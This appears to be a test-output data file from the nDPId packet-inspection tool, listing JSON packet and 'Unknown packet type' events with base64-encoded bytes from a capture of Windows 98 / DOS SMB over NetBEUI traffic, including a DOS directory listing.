00389{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":98,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AAwp1HmyAFBWM3ieADXw8AgMDgD\/7xYMAAAEACgAAxX\/U01CgQEAEgCAAAAAAAAAAAAAAAAAAAAAyHUFAACBAAAAAA=="} 00375{"packet_event_id":1,"packet_event_name":"packet","packet_id":98,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AAwp1HmyAFBWM3ieADXw8AgMDgD\/7xYMAAAEACgAAxX\/U01CgQEAEgCAAAAAAAAAAAAAAAAAAAAAyHUFAACBAAAAAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":98,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409868734} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":98,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409868734}
00401{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":99,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":62,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AFBWM3ieAAwp1HmyAD7w8AwKDgD\/7xYMAAAoAAUAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAChAAIUAAAABQAEAAUAAA=="} 00387{"packet_event_id":1,"packet_event_name":"packet","packet_id":99,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":76,"pkt_type":62,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":76,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AFBWM3ieAAwp1HmyAD7w8AwKDgD\/7xYMAAAoAAUAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAChAAIUAAAABQAEAAUAAA=="}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":99,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":62,"global_ts_msec":1576409868736} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":99,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":62,"global_ts_msec":1576409868736}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":100,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AAwp1HmyAFBWM3ieADXw8AoODgD\/7xYMAAAFACgAAxX\/U01CgQEAEgCAAAAAAAAAAAAAAAAAAAAAyHUFAAChAAAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":100,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AAwp1HmyAFBWM3ieADXw8AoODgD\/7xYMAAAFACgAAxX\/U01CgQEAEgCAAAAAAAAAAAAAAAAAAAAAyHUFAAChAAAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":100,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409868736} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":100,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409868736}
00422{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":101,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":75,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AFBWM3ieAAwp1HmyAEvw8A4MDgD\/7xYMAAAoAAYAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAADBAAIUABYAEgAEXD8\/Pz8\/Pz8\/Lj8\/PwAFAAA="} 00408{"packet_event_id":1,"packet_event_name":"packet","packet_id":101,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":89,"pkt_type":75,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":89,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AFBWM3ieAAwp1HmyAEvw8A4MDgD\/7xYMAAAoAAYAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAADBAAIUABYAEgAEXD8\/Pz8\/Pz8\/Lj8\/PwAFAAA="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":101,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":75,"global_ts_msec":1576409868736} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":101,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":75,"global_ts_msec":1576409868736}
00521{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":102,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":158,"pkt_type":144,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":158,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AAwp1HmyAFBWM3ieAJDw8AwQDgD\/7xYMAAAGACgAAxX\/U01CgQAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAADBAAECAFkABVYAgz8\/Pz8\/Pz8\/Pz8\/FgAAAQAAAAAAECpjj08AAAAALgAgICAgICAAAAAAAIM\/Pz8\/Pz8\/Pz8\/PxYBAAEAAAAAABAqY49PAAAAAC4uACAgICAgAAAAAAA="} 00507{"packet_event_id":1,"packet_event_name":"packet","packet_id":102,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":158,"pkt_type":144,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":158,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AAwp1HmyAFBWM3ieAJDw8AwQDgD\/7xYMAAAGACgAAxX\/U01CgQAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAADBAAECAFkABVYAgz8\/Pz8\/Pz8\/Pz8\/FgAAAQAAAAAAECpjj08AAAAALgAgICAgICAAAAAAAIM\/Pz8\/Pz8\/Pz8\/PxYBAAEAAAAAABAqY49PAAAAAC4uACAgICAgAAAAAAA="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":102,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":144,"global_ts_msec":1576409868736} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":102,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":144,"global_ts_msec":1576409868736}
00434{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":103,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":97,"pkt_type":83,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":97,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AFBWM3ieAAwp1HmyAFPw8BAODgD\/7xYMAAAoAAcAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAADhAAIUAAAAGgAEAAUVAIM\/Pz8\/Pz8\/Pz8\/PxYBAAEAgwAAAQ=="} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":103,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":97,"pkt_type":83,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":97,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AFBWM3ieAAwp1HmyAFPw8BAODgD\/7xYMAAAoAAcAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAADhAAIUAAAAGgAEAAUVAIM\/Pz8\/Pz8\/Pz8\/PxYBAAEAgwAAAQ=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":103,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":83,"global_ts_msec":1576409868739} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":103,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":83,"global_ts_msec":1576409868739}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":104,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AAwp1HmyAFBWM3ieADXw8A4SDgD\/7xYMAAAHACgAAxX\/U01CgQEAEgCAAAAAAAAAAAAAAAAAAAAAyHUFAADhAAAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":104,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AAwp1HmyAFBWM3ieADXw8A4SDgD\/7xYMAAAHACgAAxX\/U01CgQEAEgCAAAAAAAAAAAAAAAAAAAAAyHUFAADhAAAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":104,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409868740} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":104,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409868740}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":105,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AFBWM3ieAAwp1HmyADXw8BIQDgD\/7xYMAAAoAAgAFQP\/U01CgAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAABAQAAAA=="} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":105,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":67,"pkt_type":53,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":67,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AFBWM3ieAAwp1HmyADXw8BIQDgD\/7xYMAAAoAAgAFQP\/U01CgAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAABAQAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":105,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409868742} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":105,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":53,"global_ts_msec":1576409868742}
00404{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":106,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":77,"pkt_type":63,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":77,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AAwp1HmyAFBWM3ieAD\/w8BAUDgD\/7xYMAAAIACgAAxX\/U01CgAAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAAABAQVq\/wABAAJ2+AAAAAA="} 00390{"packet_event_id":1,"packet_event_name":"packet","packet_id":106,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":77,"pkt_type":63,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":77,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AAwp1HmyAFBWM3ieAD\/w8BAUDgD\/7xYMAAAIACgAAxX\/U01CgAAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAAABAQVq\/wABAAJ2+AAAAAA="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":106,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":63,"global_ts_msec":1576409868742} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":106,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":63,"global_ts_msec":1576409868742}
00378{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":107,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AFBWM3ieAAwp1HmyABLw8BQTDgD\/7xQAAAAoAAAAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":107,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":18,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AFBWM3ieAAwp1HmyABLw8BQTDgD\/7xQAAAAoAAAAFQP\/U01CgQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUF"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":107,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409868821} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":107,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":18,"global_ts_msec":1576409868821}
00376{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":108,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AAwp1HmyAFBWM3ieAATw8QEXHAAAAIARvbrAqO+BwKjv\/wCJAIkATA62AAgoEAABAAAAAAABIEVORUVF"} 00362{"packet_event_id":1,"packet_event_name":"packet","packet_id":108,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":4,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1576409867606,"pkt":"AAwp1HmyAFBWM3ieAATw8QEXHAAAAIARvbrAqO+BwKjv\/wCJAIkATA62AAgoEAABAAAAAAABIEVORUVF"}
00210{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":108,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409868821} 00196{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":108,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":4,"global_ts_msec":1576409868821}
00446{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":110,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":107,"pkt_type":93,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":107,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyAF3w8BYSDgD\/7xYEAAAAAAkAFQP\/U01CLQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAAhAQ\/\/AAAABwACABYAIAAeKfZdEgAAAAAAAAAAAAAAAAAKAFxURVNULlRYVAA="} 00432{"packet_event_id":1,"packet_event_name":"packet","packet_id":110,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":107,"pkt_type":93,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":107,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyAF3w8BYSDgD\/7xYEAAAAAAkAFQP\/U01CLQAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAAAhAQ\/\/AAAABwACABYAIAAeKfZdEgAAAAAAAAAAAAAAAAAKAFxURVNULlRYVAA="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":110,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":93,"global_ts_msec":1576409872653} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":110,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":93,"global_ts_msec":1576409872653}
00432{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":111,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":97,"pkt_type":83,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":97,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieAFPw8BIYDgD\/7xYMAAAJACgAAxX\/U01CLQAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAAAhAQ\/\/AAAAAAAgAB4p9l0AAAAAAgAAAAAAAgAAAAAAAAAAAA=="} 00418{"packet_event_id":1,"packet_event_name":"packet","packet_id":111,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":97,"pkt_type":83,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":97,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieAFPw8BIYDgD\/7xYMAAAJACgAAxX\/U01CLQAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAAAhAQ\/\/AAAAAAAgAB4p9l0AAAAAAgAAAAAAAgAAAAAAAAAAAA=="}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":111,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":83,"global_ts_msec":1576409872653} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":111,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":83,"global_ts_msec":1576409872653}
01912{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":112,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1204,"pkt_type":1190,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1204,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyBKbw8BgUDgD\/7xYMAAAoAAoAFQP\/U01CCwAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAABBAQUAAGQEAAAAAGQEZwQBZAQNCiBWb2x1bWUgaW4gZHJpdmUgQyBpcyBNU0RPUyAgICAgIA0KIFZvbHVtZSBTZXJpYWwgTnVtYmVyIGlzIDQwMzEtMEZFMA0KIERpcmVjdG9yeSBvZiBDOlwNCg0KQ09NTUFORCAgQ09NICAgICAgICA1NC42NDUgMzEuMDUuOTQgICAgNjoyMg0KV0lORE9XUyAgICAgIDxESVI+ICAgICAgICAgMjYuMTEuMTMgICAgODozNw0KV0lOQTIwICAgMzg2ICAgICAgICAgOS4zNDkgMzEuMDUuOTQgICAgNjoyMg0KVEVNUCAgICAgICAgIDxESVI+ICAgICAgICAgMjYuMTEuMTMgICAgODowNA0KVE9PTFMgICAgICAgIDxESVI+ICAgICAgICAgMjYuMTEuMTMgICAgODowNQ0KRE9TICAgICAgICAgIDxESVI+ICAgICAgICAgMjYuMTEuMTMgICAgODowNQ0KQVVUT0VYRUMgTkVUICAgICAgICAgICAxNjkgMTMuMTIuMTkgICAgNjo1MA0KTk9WRUxMICAgICAgIDxESVI+ICAgICAgICAgMTQuMTIuMTkgICAyMTozOQ0KTkVUICAgICAgICAgIDxESVI+ICAgICAgICAgMDcuMTAuMTkgICAyMjoxMg0KQ09ORklHICAgV0lOICAgICAgICAgICAyNzggMDcuMTAuMTkgICAyMjoxMw0KQVVUT0VYRUMgV0lOICAgICAgICAgICAyNDEgMDcuMTAuMTkgICAyMjoxMw0KQVVUT0VYRUMgQkFUICAgICAgICAgICAxNjkgMTUuMTIuMTkgICAxMDo0NQ0KQVVUT0VYRUMgT0xEICAgICAgICAgICAyNDEgMDcuMTAuMTkgICAyMjoxMw0KQ09ORklHICAgTkVUICAgICAgICAgICAxMzQgMTMuMTIuMTkgICAgNjo1MA0KQVVUT0VYRUMgTk9WICAgICAgICAgICAzMDkgMTQuMTIuMTkgICAyMTozOQ0KQ09ORklHICAgTk9WICAgICAgICAgICAyODAgMTQuMTIuMTkgICAyMTozOQ0KQ09ORklHICAgT0xEICAgICAgICAgICAyNzggMDcuMTAuMTkgICAyMjoxMw0KTkJJSFcgICAgQ0ZHICAgICAgICAgICAzODggMTUuMTIuMTkgICAxMDoxOA0KQ09ORklHICAgMDAxICAgICAgICAgICAxMzQgMTUuMTIuMTkgICAxMDo0NQ0KQVVUT0VYRUMgMDAxICAgICAgICAgICAxNjkgMTUuMTIuMTkgICAxMDo0NQ0KQ09ORklHICAgU1lTICAgICAgICAgICAxMzQgMTUuMTIuMTkgICAxMDo0NQ0KICAgICAgIDIxIGZpbGUocykgICAgICAgICA2Ni45MTggYnl0ZXMNCiAgICAgICAgICAgICAgICAgICAgIDE1Mi44NTQuNTI4IGJ5dGVzIGZyZWUNCg=="} 01898{"packet_event_id":1,"packet_event_name":"packet","packet_id":112,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":1204,"pkt_type":1190,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":1204,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyBKbw8BgUDgD\/7xYMAAAoAAoAFQP\/U01CCwAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAABBAQUAAGQEAAAAAGQEZwQBZAQNCiBWb2x1bWUgaW4gZHJpdmUgQyBpcyBNU0RPUyAgICAgIA0KIFZvbHVtZSBTZXJpYWwgTnVtYmVyIGlzIDQwMzEtMEZFMA0KIERpcmVjdG9yeSBvZiBDOlwNCg0KQ09NTUFORCAgQ09NICAgICAgICA1NC42NDUgMzEuMDUuOTQgICAgNjoyMg0KV0lORE9XUyAgICAgIDxESVI+ICAgICAgICAgMjYuMTEuMTMgICAgODozNw0KV0lOQTIwICAgMzg2ICAgICAgICAgOS4zNDkgMzEuMDUuOTQgICAgNjoyMg0KVEVNUCAgICAgICAgIDxESVI+ICAgICAgICAgMjYuMTEuMTMgICAgODowNA0KVE9PTFMgICAgICAgIDxESVI+ICAgICAgICAgMjYuMTEuMTMgICAgODowNQ0KRE9TICAgICAgICAgIDxESVI+ICAgICAgICAgMjYuMTEuMTMgICAgODowNQ0KQVVUT0VYRUMgTkVUICAgICAgICAgICAxNjkgMTMuMTIuMTkgICAgNjo1MA0KTk9WRUxMICAgICAgIDxESVI+ICAgICAgICAgMTQuMTIuMTkgICAyMTozOQ0KTkVUICAgICAgICAgIDxESVI+ICAgICAgICAgMDcuMTAuMTkgICAyMjoxMg0KQ09ORklHICAgV0lOICAgICAgICAgICAyNzggMDcuMTAuMTkgICAyMjoxMw0KQVVUT0VYRUMgV0lOICAgICAgICAgICAyNDEgMDcuMTAuMTkgICAyMjoxMw0KQVVUT0VYRUMgQkFUICAgICAgICAgICAxNjkgMTUuMTIuMTkgICAxMDo0NQ0KQVVUT0VYRUMgT0xEICAgICAgICAgICAyNDEgMDcuMTAuMTkgICAyMjoxMw0KQ09ORklHICAgTkVUICAgICAgICAgICAxMzQgMTMuMTIuMTkgICAgNjo1MA0KQVVUT0VYRUMgTk9WICAgICAgICAgICAzMDkgMTQuMTIuMTkgICAyMTozOQ0KQ09ORklHICAgTk9WICAgICAgICAgICAyODAgMTQuMTIuMTkgICAyMTozOQ0KQ09ORklHICAgT0xEICAgICAgICAgICAyNzggMDcuMTAuMTkgICAyMjoxMw0KTkJJSFcgICAgQ0ZHICAgICAgICAgICAzODggMTUuMTIuMTkgICAxMDoxOA0KQ09ORklHICAgMDAxICAgICAgICAgICAxMzQgMTUuMTIuMTkgICAxMDo0NQ0KQVVUT0VYRUMgMDAxICAgICAgICAgICAxNjkgMTUuMTIuMTkgICAxMDo0NQ0KQ09ORklHICAgU1lTICAgICAgICAgICAxMzQgMTUuMTIuMTkgICAxMDo0NQ0KICAgICAgIDIxIGZpbGUocykgICAgICAgICA2Ni45MTggYnl0ZXMNCiAgICAgICAgICAgICAgICAgICAgIDE1Mi44NTQuNTI4IGJ5dGVzIGZyZWUNCg=="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":112,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":1190,"global_ts_msec":1576409872682} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":112,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":1190,"global_ts_msec":1576409872682}
00390{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":113,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":69,"pkt_type":55,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":69,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieADfw8BQaDgD\/7xYMAAAKACgAAxX\/U01CCwAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAABBAQFkBAAA"} 00376{"packet_event_id":1,"packet_event_name":"packet","packet_id":113,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":69,"pkt_type":55,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":69,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AAwp1HmyAFBWM3ieADfw8BQaDgD\/7xYMAAAKACgAAxX\/U01CCwAAAACAAAAAAAAAAAAAAAAAAAAAyHUFAABBAQFkBAAA"}
00211{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":113,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":55,"global_ts_msec":1576409872683} 00197{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":113,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","layer_type":55,"global_ts_msec":1576409872683}
00398{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":114,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":73,"pkt_type":59,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":73,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyADvw8BoWDgD\/7xYMAAAoAAsAFQP\/U01CBAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAABhAQMAAB4p9l0AAA=="} 00384{"packet_event_id":1,"packet_event_name":"packet","packet_id":114,"source":"dos_win98_smb_netbeui.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":73,"pkt_type":59,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":73,"pkt_l4_len":0,"thread_ts_msec":1576409871610,"pkt":"AFBWM3ieAAwp1HmyADvw8BoWDgD\/7xYMAAAoAAsAFQP\/U01CBAAAAAAAAAAAAAAAAAAAAAAAAAAAyHUFAABhAQMAAB4p9l0AAA=="}
